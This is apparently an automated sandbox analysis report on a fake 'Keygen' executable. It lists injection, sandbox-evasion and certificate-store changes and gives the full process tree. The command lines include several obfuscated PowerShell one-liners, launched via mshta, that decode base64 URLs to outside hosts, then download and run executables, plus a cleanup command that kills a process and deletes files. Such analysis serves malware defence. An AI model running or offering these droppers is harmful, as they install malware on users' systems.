snd.exeNHtrdsaghfDF.exervm.exeFVjhgtresfdbv.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exepmo.exehgfnmbasdo.exeaxcsdfa.exedescription pid process target process PID 2668 set thread context of 2964 2668 snd.exe snd.exe PID 2844 set thread context of 2984 2844 NHtrdsaghfDF.exe NHtrdsaghfDF.exe PID 2692 set thread context of 3008 2692 rvm.exe rvm.exe PID 2820 set thread context of 3056 2820 FVjhgtresfdbv.exe FVjhgtresfdbv.exe PID 2856 set thread context of 1460 2856 FVjhgtresfdbv.exe FVjhgtresfdbv.exe PID 2892 set thread context of 2220 2892 NHtrdsaghfDF.exe NHtrdsaghfDF.exe PID 2592 set thread context of 2564 2592 pmo.exe pmo.exe PID 1608 set thread context of 1036 1608 hgfnmbasdo.exe hgfnmbasdo.exe PID 596 set thread context of 392 596 axcsdfa.exe axcsdfa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1956 3056 WerFault.exe FVjhgtresfdbv.exe 2468 1036 WerFault.exe hgfnmbasdo.exe 1156 2964 WerFault.exe snd.exe -
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
FVjhgtresfdbv.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FVjhgtresfdbv.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 1920 timeout.exe 756 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2420 taskkill.exe -
Processes:
mshta.exemshta.exemshta.exemshta.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Processes:
snd.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 snd.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 snd.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWerFault.exeWerFault.exeWerFault.exepid process 1500 powershell.exe 1480 powershell.exe 1400 powershell.exe 1592 powershell.exe 1576 powershell.exe 1484 powershell.exe 1480 powershell.exe 1592 powershell.exe 1400 powershell.exe 1500 powershell.exe 1484 powershell.exe 1576 powershell.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
snd.exeNHtrdsaghfDF.exervm.exeFVjhgtresfdbv.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exepid process 2668 snd.exe 2844 NHtrdsaghfDF.exe 2692 rvm.exe 2820 FVjhgtresfdbv.exe 2856 FVjhgtresfdbv.exe 2892 NHtrdsaghfDF.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepmo.exetaskkill.exeWerFault.exehgfnmbasdo.exeWerFault.exeaxcsdfa.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 2592 pmo.exe Token: SeDebugPrivilege 2420 taskkill.exe Token: SeDebugPrivilege 1956 WerFault.exe Token: SeDebugPrivilege 1608 hgfnmbasdo.exe Token: SeDebugPrivilege 2468 WerFault.exe Token: SeDebugPrivilege 596 axcsdfa.exe Token: SeDebugPrivilege 1156 WerFault.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
Keygen.exesnd.exervm.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exepid process 1852 Keygen.exe 2668 snd.exe 2692 rvm.exe 2844 NHtrdsaghfDF.exe 2820 FVjhgtresfdbv.exe 2856 FVjhgtresfdbv.exe 2892 NHtrdsaghfDF.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Keygen — копия (66) — копия.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exedescription pid process target process PID 1580 wrote to memory of 1812 1580 Keygen — копия (66) — копия.exe cmd.exe PID 1580 wrote to memory of 1812 1580 Keygen — копия (66) — копия.exe cmd.exe PID 1580 wrote to memory of 1812 1580 Keygen — копия (66) — копия.exe cmd.exe PID 1580 wrote to memory of 1812 1580 Keygen — копия (66) — копия.exe cmd.exe PID 1812 wrote to memory of 1852 1812 cmd.exe Keygen.exe PID 1812 wrote to memory of 1852 1812 cmd.exe Keygen.exe PID 1812 wrote to memory of 1852 1812 cmd.exe Keygen.exe PID 1812 wrote to memory of 1852 1812 cmd.exe Keygen.exe PID 1812 wrote to memory of 1888 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1888 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1888 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1888 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1908 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1908 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1908 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1908 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1920 1812 cmd.exe timeout.exe PID 1812 wrote to memory of 1920 1812 cmd.exe timeout.exe PID 1812 wrote to memory of 1920 1812 cmd.exe timeout.exe PID 1812 wrote to memory of 1920 1812 cmd.exe timeout.exe PID 1908 wrote to memory of 1576 1908 mshta.exe powershell.exe PID 1908 wrote to memory of 1576 1908 mshta.exe powershell.exe PID 1908 wrote to memory of 1576 1908 mshta.exe powershell.exe PID 1908 wrote to memory of 1576 1908 mshta.exe powershell.exe PID 1888 wrote to memory of 1592 1888 mshta.exe powershell.exe PID 1888 wrote to memory of 1592 1888 mshta.exe powershell.exe PID 1888 wrote to memory of 1592 1888 mshta.exe powershell.exe PID 1888 wrote to memory of 1592 1888 mshta.exe powershell.exe PID 1812 wrote to memory of 1092 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1092 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1092 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1092 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 568 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 568 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 568 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 568 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 756 1812 cmd.exe timeout.exe PID 1812 wrote to memory of 756 1812 cmd.exe timeout.exe PID 1812 wrote to memory of 756 1812 cmd.exe timeout.exe PID 1812 wrote to memory of 756 1812 cmd.exe timeout.exe PID 1092 wrote to memory of 1500 1092 mshta.exe powershell.exe PID 1092 wrote to memory of 1500 1092 mshta.exe powershell.exe PID 1092 wrote to memory of 1500 1092 mshta.exe powershell.exe PID 1092 wrote to memory of 1500 1092 mshta.exe powershell.exe PID 568 wrote to memory of 1400 568 mshta.exe powershell.exe PID 568 wrote to memory of 1400 568 mshta.exe powershell.exe PID 568 wrote to memory of 1400 568 mshta.exe powershell.exe PID 568 wrote to memory of 1400 568 mshta.exe powershell.exe PID 1812 wrote to memory of 300 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 300 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 300 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 300 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1676 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1676 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1676 1812 cmd.exe mshta.exe PID 1812 wrote to memory of 1676 1812 cmd.exe mshta.exe PID 300 wrote to memory of 1484 300 mshta.exe powershell.exe PID 300 wrote to memory of 1484 300 mshta.exe powershell.exe PID 300 wrote to memory of 1484 300 mshta.exe powershell.exe PID 300 wrote to memory of 1484 300 mshta.exe powershell.exe PID 1676 wrote to memory of 1480 1676 mshta.exe powershell.exe PID 1676 wrote to memory of 1480 1676 mshta.exe powershell.exe PID 1676 wrote to memory of 1480 1676 mshta.exe powershell.exe PID 1676 wrote to memory of 1480 1676 mshta.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (66) — копия.exe"C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (66) — копия.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\4E9D.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (66) — ?????.exe""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Users\Admin\AppData\Local\Temp\4E9D.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1852 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4E9D.tmp\m.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Users\Public\rvm.exe"C:\Users\Public\rvm.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1460 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 1460 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\629714569818472\\* & exit8⤵PID:2320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 14609⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2420 -
C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"7⤵
- Executes dropped EXE
PID:2220 -
C:\Users\Public\rvm.exe"C:\Users\Public\rvm.exe"6⤵
- Executes dropped EXE
PID:3008 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4E9D.tmp\m1.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576 -
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:1920 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4E9D.tmp\b.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500 -
C:\Users\Public\pmo.exe"C:\Users\Public\pmo.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2592 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"6⤵
- Loads dropped DLL
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"8⤵
- Loads dropped DLL
PID:2632 -
C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:596 -
C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"10⤵
- Executes dropped EXE
PID:392 -
C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"8⤵
- Executes dropped EXE
PID:1036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 7849⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468 -
C:\Users\Public\pmo.exe"C:\Users\Public\pmo.exe"6⤵
- Executes dropped EXE
PID:2564 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4E9D.tmp\b1.hta"3⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400 -
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:756 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4E9D.tmp\ba.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484 -
C:\Users\Public\snd.exe"C:\Users\Public\snd.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"7⤵
- Executes dropped EXE
PID:3056 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 7768⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2844 -
C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"7⤵
- Executes dropped EXE
PID:2984 -
C:\Users\Public\snd.exe"C:\Users\Public\snd.exe"6⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2964 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 8967⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4E9D.tmp\ba1.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
